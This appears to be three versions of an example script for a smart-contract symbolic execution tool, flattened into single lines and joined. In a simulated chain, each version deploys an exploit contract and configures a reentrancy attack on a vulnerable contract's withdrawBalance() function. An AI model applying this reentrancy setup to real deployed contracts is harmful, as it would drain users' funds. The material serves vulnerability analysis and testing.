exploit_account = m.solidity_create_contract(exploit_source_code, owner=attacker_account) print "[+] Setup the exploit" exploit_account.set_vulnerable_contract(contract_account) exploit_account.set_reentry_reps(2) print "[+] Setting attack string" #'\x9d\x15\xfd\x17'+pack_msb(32)+pack_msb(4)+'\x5f\xd8\xc7\x10', reentry_string = ABI.function_selector('withdrawBalance()') exploit_account.set_reentry_attack_string(reentry_string) print "[+] Initial world state" print " attacker_account %x balance: %d" % (attacker_account, m.get_balance(attacker_account)) print " exploit_account %x balance: %d" % (exploit_account, m.get_balance(exploit_account)) print " user_account %x balance: %d" % (user_account, m.get_balance(user_account)) print " contract_account %x balance: %d" % (contract_account, m.get_balance(contract_account)) #User deposits all in contract print "[+] user deposited some." contract_account.addToBalance(value=100000000000000000) print "[+] Let attacker deposit some small amount using exploit" exploit_account.proxycall(ABI.function_selector('addToBalance()'), value=100000000000000000)
#Initialize user and contracts user_account = m.create_account(balance=100000000000000000) attacker_account = m.create_account(balance=100000000000000000) contract_account = m.solidity_create_contract(contract_source_code, owner=user_account) #Not payable exploit_account = m.solidity_create_contract(exploit_source_code, owner=attacker_account) #User deposits all in contract print("[+] user deposited some.") contract_account.addToBalance(value=100000000000000000) print("[+] Initial world state") print(" attacker_account %x balance: %d" % (attacker_account.address, m.get_balance(attacker_account.address))) print(" exploit_account %x balance: %d" % (exploit_account.address, m.get_balance(exploit_account.address))) print(" user_account %x balance: %d" % (user_account.address, m.get_balance(user_account.address))) print(" contract_account %x balance: %d" % (contract_account.address, m.get_balance(contract_account.address))) print("[+] Set up the exploit") exploit_account.set_vulnerable_contract(contract_account) print("\t Setting 30 reply reps") exploit_account.set_reentry_reps(30) print("\t Setting reply string") exploit_account.set_reentry_attack_string(m.make_symbolic_buffer(4))
''' #Initialize user and contracts user_account = m.create_account(balance=100000000000000000) attacker_account = m.create_account(balance=100000000000000000) contract_account = m.solidity_create_contract(contract_source_code, owner=user_account) #Not payable exploit_account = m.solidity_create_contract(exploit_source_code, owner=attacker_account) #User deposits all in contract print "[+] user deposited some." contract_account.addToBalance(value=100000000000000000) print "[+] Initial world state" print " attacker_account %x balance: %d"% (attacker_account, m.get_balance(attacker_account)) print " exploit_account %x balance: %d"% (exploit_account, m.get_balance(exploit_account)) print " user_account %x balance: %d"% (user_account, m.get_balance(user_account)) print " contract_account %x balance: %d"% (contract_account, m.get_balance(contract_account)) print "[+] Setup the exploit" exploit_account.set_vulnerable_contract(contract_account) print "\t Setting 30 reply reps" exploit_account.set_reentry_reps(30) print "\t Setting reply string" exploit_account.set_reentry_attack_string(m.SByte(4))